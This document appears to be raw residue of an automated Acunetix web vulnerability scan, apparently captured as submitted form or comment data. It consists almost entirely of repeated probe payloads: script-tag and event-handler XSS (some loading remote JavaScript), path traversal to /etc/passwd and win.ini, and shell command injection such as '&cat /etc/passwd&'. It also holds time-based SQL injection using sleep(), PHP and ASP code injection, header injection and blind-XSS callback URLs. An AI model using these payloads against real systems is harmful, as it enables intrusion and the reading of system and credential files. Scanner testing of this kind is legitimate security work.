acux9880\xc0\xbez1\xc0\xbcz2a\x90bcxuca9880

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(953658)</ScRiPt>

1

1

1<script>prompt(964217)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(960202)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995233></ScRiPt>

1

1<ScRiPt >prompt(907694)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(923241)">

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(941618)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9818278*9679493)

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

1

'+response.write(9818278*9679493)+'

1<div style=width:expression(prompt(918392))>

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

"+response.write(9818278*9679493)+"

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

1<body onload=prompt(953002)>

1

1

WEB-INF\web.xml

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990115)>

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

${99164+99432}

1

1<img src=xyz OnErRor=prompt(938365)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

-1

)

1<img/src=">" onerror=alert(996253)>

1&n912765=v914490

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1<ScRiPt%20>prompt(952029)</sCripT>

1

-1))

1

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

1&lt

1

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

QhoN8zJU'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

\xf6<img acu onmouseover=prompt(975476) //\xf6>

1

1

/etc/passwd

1

0DnRc9BH')

1

'

http://hityeC8K97Z2g.bxss.me/

1<input autofocus onfocus=prompt(933574)>

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

icuahmOo'))

"

1

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

-1)

comments

http://www.acunetix.tst

1_oU9qL <ScRiPt >prompt(992029)</ScRiPt>

1

1

-1))

'&dir&'

1

'"

comments/.

1'"()&%<ScRiPt >prompt(911361)</ScRiPt>

1

IXGQn8QI'

1

1

file:///etc/passwd

<!--

"&dir&"

1

1

k0UteCz6')

'"()&%<ScRiPt >prompt(932106)</ScRiPt>

1

1

1

|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

1

iZjvXFnR'))

1_917113

1

1

1

WEB-INF/web.xml

'|dir

1

1

1

1

WEB-INF\web.xml

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

acu2629\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2629

1

../../../../../../../../../../boot.ini

1

acux4737\xc0\xbez1\xc0\xbcz2a\x90bcxuca4737

1

1

1<ScRiPt >prompt(985232)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(910787)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(943262)</ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957149></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(986894)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(960207)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(928302)"></g></svg>

1

response.write(9253472*9375184)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<div style=width:expression(prompt(934118))>

'+response.write(9253472*9375184)+'

1

&cat /etc/passwd&

1<iframe src='data:text/html

1

1

"+response.write(9253472*9375184)+"

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

1

1<body onload=prompt(920108)>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(917246)>

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(936492)>

1

1

cat /etc/passwd

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img/src=">" onerror=alert(982903)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

1<ScRiPt%20>prompt(925502)</sCripT>

1

-1

`cat /etc/passwd`

1

1&lt

${99357+99530}

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

-1)

1

1

1

\xf6<img acu onmouseover=prompt(903315) //\xf6>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

1

-1))

1&n927712=v982620

1<input autofocus onfocus=prompt(915085)>

)

1some_inexistent_file_with_long_name%00.jpg

1

1

3L3ZuCoy'

"|"ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

<a href='http://www.acunetix.com'>website security</a>

'"()

1

kSFvSs0O')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

testasp.vulnweb.com

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

p7WV0PxL'))

'

1

[url=http://www.acunetix.com]website security[/url]

1

1

'

1

/etc/passwd

1_TOHOq <ScRiPt >prompt(992076)</ScRiPt>

"

1

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

1

1

-1)

1

${@print(md5(acunetix_wvs_security_test))}

1

http://hituw00A6D0V9.bxss.me/

1

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

acunetix_wvs_invalid_filename

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

1

1

dP4yvsHR'

1

1

1

comments

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

TYNhTIoK')

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(929459)</ScRiPt>

"&dir&"

file:///etc/passwd

1

'"

1

comments/.

1

'"()&%<ScRiPt >prompt(972254)</ScRiPt>

XP1AUUF2'))

1

1

1

1

<!--

|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

1_913752

1

1

1

WEB-INF/web.xml

'|dir

1

1

WEB-INF\web.xml

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

acu8026\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8026

1

1

../../../../../../../../../../boot.ini

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acux1909\xc0\xbez1\xc0\xbcz2a\x90bcxuca1909

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(932178)</ScRiPt>

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(961371)</script>

1

1<ScRiPt >prompt(972931)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?948817></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(999010)</ScRiPt>

1

response.write(9134641*9054661)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<video><source onerror="javascript:prompt(959294)">

'+response.write(9134641*9054661)+'

1

1

1

"+response.write(9134641*9054661)+"

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(908211)"></g></svg>

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<div style=width:expression(prompt(908651))>

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

1

1<iframe src='data:text/html

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1

1<body onload=prompt(943944)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(999270)>

1

`cat /etc/passwd`

1

${99388+100118}

1

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1

1<img src=xyz OnErRor=prompt(973730)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

1&n991968=v916262

-1)

'|'ld

1

1<img/src=">" onerror=alert(900519)>

1some_inexistent_file_with_long_name%00.jpg

1

-1))

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

"|"ld

1

1<ScRiPt%20>prompt(988058)</sCripT>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1

9LTt79Gd'

1

1&lt

testasp.vulnweb.com

1

C9MOgHvZ')

1

'

/etc/passwd

1

1

1

\xf6<img acu onmouseover=prompt(933806) //\xf6>

1

'

1

1

"

dKYxLJBv'))

1<input autofocus onfocus=prompt(936395)>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

1

1

-1)

||cat /etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hiten3zLNw0Mv.bxss.me/

&dir

acunetix_wvs_invalid_filename

1

-1))

1

1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1_Xg85v <ScRiPt >prompt(982357)</ScRiPt>

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

dwtJxtw4'

'&dir&'

1

1

comments

1

http://www.acunetix.tst

1

1

fFF1YBxu')

"&dir&"

1

comments/.

1'"()&%<ScRiPt >prompt(940521)</ScRiPt>

file:///etc/passwd

'"

1

|dir

1

1

oLqdQMWK'))

1

1

<!--

1

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(924752)</ScRiPt>

1

1

1

1

'|dir

WEB-INF/web.xml

1

1_973787

"|dir

1

1

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu7138\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7138

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux6823\xc0\xbez1\xc0\xbcz2a\x90bcxuca6823

1

................windowswin.ini

1

1

1

1<ScRiPt >prompt(982069)</ScRiPt>

1

1

1<script>prompt(923463)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(930709)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?947291></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(938878)</ScRiPt>

1

response.write(9390287*9784683)

1

1<video><source onerror="javascript:prompt(903411)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(923242)"></g></svg>

'+response.write(9390287*9784683)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<div style=width:expression(prompt(924945))>

1

1

"+response.write(9390287*9784683)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<iframe src='data:text/html

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1<body onload=prompt(951647)>

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(984977)>

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

cat /etc/passwd

1<img src=xyz OnErRor=prompt(945934)>

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

-1

1

`cat /etc/passwd`

1

1

${99147+100076}

1<img/src=">" onerror=alert(922361)>

1

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

)

1<ScRiPt%20>prompt(991733)</sCripT>

1

1&n955612=v901347

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

1

1&lt

!(()&&!|*|*|

1

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

c0IOxidK'

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

\xf6<img acu onmouseover=prompt(901661) //\xf6>

1

testasp.vulnweb.com

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

7mRLmHf1')

1

1

1<input autofocus onfocus=prompt(910825)>

"

'

1

1

ye0nkSSx'))

1

<a href='http://www.acunetix.com'>website security</a>

1

1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

-1

http://hitMnGy8dh2Zq.bxss.me/

1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

1

1

1

-1)

1

comments

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1_n2pR6 <ScRiPt >prompt(944173)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1))

1

&dir

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

'&dir&'

1

'"

svG4MoAz'

http://www.acunetix.tst

comments/.

1

1'"()&%<ScRiPt >prompt(982084)</ScRiPt>

1

1

rr77fyIZ')

1

<!--

"&dir&"

1

Fpz5eba5'))

'"()&%<ScRiPt >prompt(928988)</ScRiPt>

1

1

file:///etc/passwd

1

1

1

1

|dir

1_984472

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

WEB-INF/web.xml

1

"|dir

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

acu8210\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8210

../../../../../../../../../../windows/win.ini.jpg

1

acux5259\xc0\xbez1\xc0\xbcz2a\x90bcxuca5259

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(957230)</ScRiPt>

1

1

1

................windowswin.ini

1

1<script>prompt(931341)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(906903)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?991682></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9658218*9125477)

1

1

1<ScRiPt >prompt(963298)</ScRiPt>

1

'+response.write(9658218*9125477)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<video><source onerror="javascript:prompt(962631)">

"+response.write(9658218*9125477)+"

1

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(999378)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

WEB-INF/web.xml

1

1

1

1<div style=width:expression(prompt(913789))>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1

1

1<body onload=prompt(931550)>

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

${99141+100480}

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(976104)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<img src=xyz OnErRor=prompt(920303)>

1&n953101=v981381

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

-1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(941066)>

1

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<ScRiPt%20>prompt(920794)</sCripT>

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

^(#$!@#$)(()))******

-1))

1

testasp.vulnweb.com

"|"ld

1&lt

1

/etc/passwd

1

'

1

6uqurQCf'

1

1

\xf6<img acu onmouseover=prompt(948861) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

OpCvF4L0')

1

'

1<input autofocus onfocus=prompt(995294)>

1

1

KUCIfYtP'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

1

"

<a href='http://www.acunetix.com'>website security</a>

-1

http://hit62TZDE6Oib.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

1

-1)

||cat /etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://www.acunetix.tst

&dir

1_i6XmE <ScRiPt >prompt(982451)</ScRiPt>

comments/.

1

Fnc9aXfw'

'"

1

'&dir&'

1

UhzZrBkC')

1'"()&%<ScRiPt >prompt(952224)</ScRiPt>

1

1

1

"&dir&"

1

<!--

1

1

1

rKwHrOzS'))

'"()&%<ScRiPt >prompt(975442)</ScRiPt>

1

file:///etc/passwd

1

|dir

1

1

1_949107

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

1

1

WEB-INF/web.xml

1

"|dir

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

acu5155\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5155

1

../../../../../../../../../../windows/win.ini.jpg

acux9304\xc0\xbez1\xc0\xbcz2a\x90bcxuca9304

1

1

1<ScRiPt >prompt(964395)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(978176)</script>

1

................windowswin.ini

1<ScRiPt >prompt(948411)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?925110></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

response.write(9959095*9821691)

1

1

1

1

'+response.write(9959095*9821691)+'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

1

1

1

1<ScRiPt >prompt(996832)</ScRiPt>

1

1

"+response.write(9959095*9821691)+"

'&cat /etc/passwd&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(997881)">

1

1

1

1

"&cat /etc/passwd&"

WEB-INF/web.xml

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(999760)"></g></svg>

1

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<div style=width:expression(prompt(984882))>

1

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

1

-1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100385+99896}

|cat /etc/passwd#

1

1

-1)

1

1<body onload=prompt(975533)>

1&n928112=v985351

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961436)>

1

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

)

"|"ld

L8E4LjTk'

1

1

1<img src=xyz OnErRor=prompt(903560)>

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

'"()

1<img/src=">" onerror=alert(987820)>

1

48YSl5Hm')

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

1

AbxCalgr'))

'

1<ScRiPt%20>prompt(934052)</sCripT>

1

/etc/passwd

1

1

1

"

1

1&lt

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

||cat /etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}

1

\xf6<img acu onmouseover=prompt(913346) //\xf6>

1

&dir

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

acunetix_wvs_invalid_filename

1<input autofocus onfocus=prompt(946602)>

-1))

${@print(md5(acunetix_wvs_security_test))}\

http://hitLD9uyX7oDF.bxss.me/

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1

1

VoGEOoyA'

1

<a href='http://www.acunetix.com'>website security</a>

comments

1

"&dir&"

1

1

[url=http://www.acunetix.com]website security[/url]

comments

zd3wcEM3')

1

1

'"

file:///etc/passwd

http://www.acunetix.tst

1

|dir

1_yzUeE <ScRiPt >prompt(993518)</ScRiPt>

vIlZ6Ce3'))

1

comments/.

<!--

1'"()&%<ScRiPt >prompt(994131)</ScRiPt>

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

1

WEB-INF/web.xml

1

1

"|dir

